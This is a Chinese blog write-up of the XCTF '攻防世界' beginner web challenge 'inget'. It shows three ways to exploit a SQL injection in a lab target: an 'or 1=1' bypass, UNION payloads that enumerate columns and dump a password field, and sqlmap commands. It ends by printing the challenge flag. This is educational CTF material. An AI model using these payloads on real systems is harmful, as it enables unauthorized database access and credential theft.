攻防世界WEB（新手模式）14-inget

点点开心

已于 2024-11-07 18:29:35 修改

阅读量419

点赞数 2

分类专栏：攻防世界文章标签： sql mysql 数据库网络安全 web安全

于 2024-11-07 14:35:39 首次发布

本文链接：https://blog.youkuaiyun.com/m0_74138139/article/details/143592499

版权

攻防世界专栏收录该内容

17 篇文章

订阅专栏

方法一

方法二

方法三

打开环境只有简短的一句话

意思是：输入id，并尝试绕过

确实没什么反应，需要尝试绕过。。下面搜集了三种方法供大家“食用”

方法一

食用万能密码，直接爆破出来

?id='or' 1=1#

方法二

先手动判断类型

?id=1' union select 2,3 --+

查看回显

?id=1' union select 2,database() --+

2作为一个攻击量，database（）尝试返回当前数据库名称

爆出数据库名称，继续查询该数据库内字段

?id=1' union select 2,group_concat(column_name) from information_schema.columns where table_name = 'cyber' --+

发现了三个字段，查看pw（因为他是password的缩写，第一怀疑他）

?id=1' union select 2,group_concat(pw) from cyber.cyber --+

得到flaG

方法三

食用sqlmap，先输入sqlmap判断自己是否有

sqlmap -u "http://61.147.171.105:49823/index.php?id=1" -dbs

爆出数据库（记得把端口改成自己靶机de,不然会报错0）

查看数据库

sqlmap -u "http://61.147.171.105:49823/index.php?id=1" -D cyber --dump

不确定的话可以把所有数据库都看一遍，寻找flag

cyberpeace{a68e3cc75a79661999bbdd7cd8bcf1fd}

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

点点开心

关注关注

2
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

【网络安全 | CTF】攻防世界 inget 解题详析

等风来

07-23

6402

由于该语句为真，却无回显，故可排除数字型注入。语句，再根据回显做下一步判断。思路：尝试利用or构造。使用sqlmap爆数据。

【网络安全 | CTF】攻防世界 get_post 解题详析

等风来

05-20

5660

题目描述：X老师告诉小宁同学HTTP通常使用两种请求方法，你知道是哪两种吗？使用Hack Bar提交GET参数Payload：?a=1

参与评论您还未登录，请先登录后发表或查看评论

20201228攻防世界WEB模块入门级别全详解通关记录

qq_45290991的博客

12-29

2428

在学（hun）习（ji）了DVWA靶场之后，为了进一步加深实战环境下对各个web常见漏洞的理解和绕过机制，我在同学的推荐之下开始了攻防世界的web题目练习。第一题如题描述查看源码发现鼠标右键的菜单机制被禁止了，可以按火狐（谷歌）浏览器的查看网页源码的快捷键Ctrl+U，查看源码。 <script> document.oncontextmenu=new Function("return false") document.onselectstart=new Function("ret

攻防世界(Web)

她叫常玉莹

07-28

541

view_sourcerobotsbackupcookiedisabled_buttonweak_authsimple_phpget_postxff_refererwebshellcommand_executionsimple_js 博客新地址：c7ay.top view_source F12就能看到flag签到题，url前加view_source也可以 robots 查看robots.txt，disallow提示有php文件，访问得flag backup 题目很明显考察备份文件 php的备份.

【攻防世界】新手练习区(下)

如果巅峰留不住，那就重走来时路

03-29

661

求知若渴，虚心若愚

攻防世界-inget

m0_62094846的博客

10-06

1416

看到说id，可能id是参数，尝试了几个数，页面都没有变化，也没有延时回显。看了wp，确实是sql注入，注入点是id，用sqlmap扫就可以出来。源代码里没有东西，御剑之类的也扫不到。

攻防世界--inget

qq_73611185的博客

09-09

279

然后就不会做了（web知识面非常浅薄，采用边做题边学知识的做法），开始在网上找wp，看了wp说这里使用sql注入的万能语句？我们知道SQL语句中where相当于判断语句，并且是由 or 连接的，所以 username=’’ 和 1=1 中有一个为真就为真。原文链接：https://blog.youkuaiyun.com/weixin_41607190/article/details/82818804。我们分析下语义，在SQL语法中 # 是注释符，所以后面的语句都会杯注释掉，那么上面的语句就等价于。

攻防世界 inget

qq_53105813的博客

10-15

1286

攻防世界wp

【攻防世界】CTF 网络安全学习180天之 inget_please enter id,and try to bypass

2401_84248681的博客

05-08

618

SQL注入是一种利用应用程序对用户输入的处理不当而导致的安全漏洞。攻击者通过在用户输入中插入恶意的SQL代码，从而欺骗应用程序执行非预期的数据库操作。翻译过来就是输入id，且尝试绕过，查看源代码，发现源代码只有这一句话，也没有其他信息。这个题目的题目描述为无，但在进入了题目界面后，提示了这样子的一句话。CTF攻防就是信息的整理和收集，然后把所有细节加起来考虑出方向。下面将是我的思路，以id作为参数然后作为绕过。结果就是无事发生，是老样子。Python爬虫学习专栏。方向：Web，SQL注入。

攻防世界 web

2406_87429010的博客

01-16

852

如果 preg_match 检测到这些恶意模式，就可以采取相应的措施，比如拒绝处理该输入，从而在一定程度上防止SQL注入攻击。因为参数在URL中，所以它有长度限制，且安全性稍差，不过GET请求比较简单直观，适合获取数据，像在浏览器中输入网址查看网页内容，就是发送GET请求。它将数据放在请求体中发送给服务器，数据不会像GET请求那样直接暴露在URL中，安全性相对较高，而且对数据长度的限制相对宽松。输入1，页面正常，输入1 and 1=2 页面正常说明是字符型注入。这道题传参，使用get,post方式。

inget install --id Microsoft.DevHome -

04-03

### 安装 Microsoft DevHome 使用 `inget` 命令要通过 `inget` 命令安装 Microsoft DevHome 插件或组件，通常需要遵循特定的语法结构来指定目标包以及可能的身份验证参数。以下是详细的说明： #### 1. 准备工作 ...

攻防世界-Web篇

weixin_43454872的博客

11-09

213

攻防世界-Web新手篇 1.题目描述 robots X老师上课讲了Robots协议，小宁同学却上课打了瞌睡，赶紧来教教小宁Robots协议是什么吧。 2.题目场景 http://220.249.52.133:40046 3.writeu解题思路 robots是网站跟爬虫间的协议，用简单直接的txt格式文本方式告诉对应的爬虫被允许的权限，也就是说robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。当一个搜索蜘蛛访问一个站点时，它会首先检查该站点根目录下是否存在robots.txt，如果存在，搜

攻防世界（web新手版）